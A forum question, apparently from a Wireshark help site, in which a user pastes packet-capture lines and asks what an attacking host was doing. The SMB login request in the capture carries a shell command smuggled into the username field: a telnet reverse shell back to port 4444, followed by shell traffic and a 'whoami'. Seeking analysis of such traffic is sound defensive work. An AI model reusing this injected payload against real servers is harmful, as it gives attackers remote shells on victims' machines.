hi, From my pcap file, I got the following portion of information but not sure what the source IP is trying to achieve.
frame time src ip dest ip protocol src port dest port infor 21769 147.373996 192.168.0.100 192.168.0.101 SMB 54500 139 Session Setup AndX Request, User: .\/=`nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|while : ; do sh && break; done 2>&1|telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'` 21770 147.394553 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [SYN] Seq=0 Win=5840 Len=0 MSS=1460 SACK_PERM=1 TSval=6036562 TSecr=0 WS=32 0x0002 21771 147.394664 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=13805079 TSecr=6036562 WS=1024 0x0012 21772 147.395838 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [ACK] Seq=1 Ack=1 Win=5856 Len=0 TSval=6036562 TSecr=13805079 0x0010 21773 147.406146 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [SYN] Seq=0 Win=5840 Len=0 MSS=1460 SACK_PERM=1 TSval=6036563 TSecr=0 WS=32 0x0002 21774 147.406244 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=13805081 TSecr=6036563 WS=1024 0x0012 21775 147.407522 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [ACK] Seq=1 Ack=1 Win=5856 Len=0 TSval=6036563 TSecr=13805081 0x0010 21776 147.407694 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=1 Ack=1 Win=5856 Len=39 TSval=6036563 TSecr=13805081 sh line 1 : Trying : command not found 21777 147.407721 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=40 Win=15360 Len=0 TSval=13805082 TSecr=6036563 21778 147.410351 192.168.0.101 192.168.0.100 TCP 139 54500 139→54500 [ACK] Seq=102 Ack=376 Win=6880 Len=0 TSval=6036564 TSecr=13805073 21779 147.427226 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=40 Ack=1 Win=5856 Len=42 TSval=6036565 TSecr=13805082 sh: line 2: Connected: Command not found 21780 147.427309 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=82 Win=15360 Len=0 TSval=13805087 TSecr=6036565 21781 147.440335 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=82 Ack=1 Win=5856 Len=39 TSval=6036567 TSecr=13805087 sh: line 3:Escape: command not found 21782 147.440457 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=121 Win=15360 Len=0 TSval=13805090 TSecr=6036567 21783 147.448315 192.168.0.101 192.168.0.100 SMB 139 54500 Session Setup AndX Response, Error: STATUS_LOGON_FAILURE 21784 147.486578 192.168.0.100 192.168.0.101 TCP 54500 139 54500→139 [ACK] Seq=376 Ack=141 Win=15360 Len=0 TSval=13805102 TSecr=6036567 21785 147.663484 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [PSH, ACK] Seq=1 Ack=1 Win=15360 Len=23 TSval=13805146 TSecr=6036562 echo X nxb0Jq26W1POGYH 21786 147.664095 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [ACK] Seq=1 Ack=24 Win=5856 Len=0 TSval=6036589 TSecr=13805146 21787 147.664294 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=121 Ack=1 Win=5856 Len=18 TSval=6036589 TSecr=1380509 XnXb0J q26w1POGYH 21788 147.664321 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=139 Win=15360 Len=0 TSval=13805146 TSecr=6036589 21789 147.668188 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [PSH, ACK] Seq=1 Ack=139 Win=15360 Len=23 TSval=13805147 TSecr=6036589 echo X nxb0Jq26W1POGYH 21790 147.668708 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [ACK] Seq=139 Ack=24 Win=5856 Len=0 TSval=6036589 TSecr=13805147 21791 148.989787 192.168.0.100 192.168.0.101 TCP 54500 139 54500→139 [RST, ACK] Seq=376 Ack=141 Win=15360 Len=0 TSval=13805477 TSecr=6036567 21792 152.823638 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [PSH, ACK] Seq=24 Ack=1 Win=15360 Len=7 TSval=13806436 TSecr=6036589 whoami
regards george
asked 27 Feb '15, 09:57
Geos
1●1●1●1
accept rate: 0%
edited 27 Feb '15, 10:48
grahamb ♦
19.8k●3●30●206
Can you share a capture in a publicly accessible spot, e.g. CloudShark?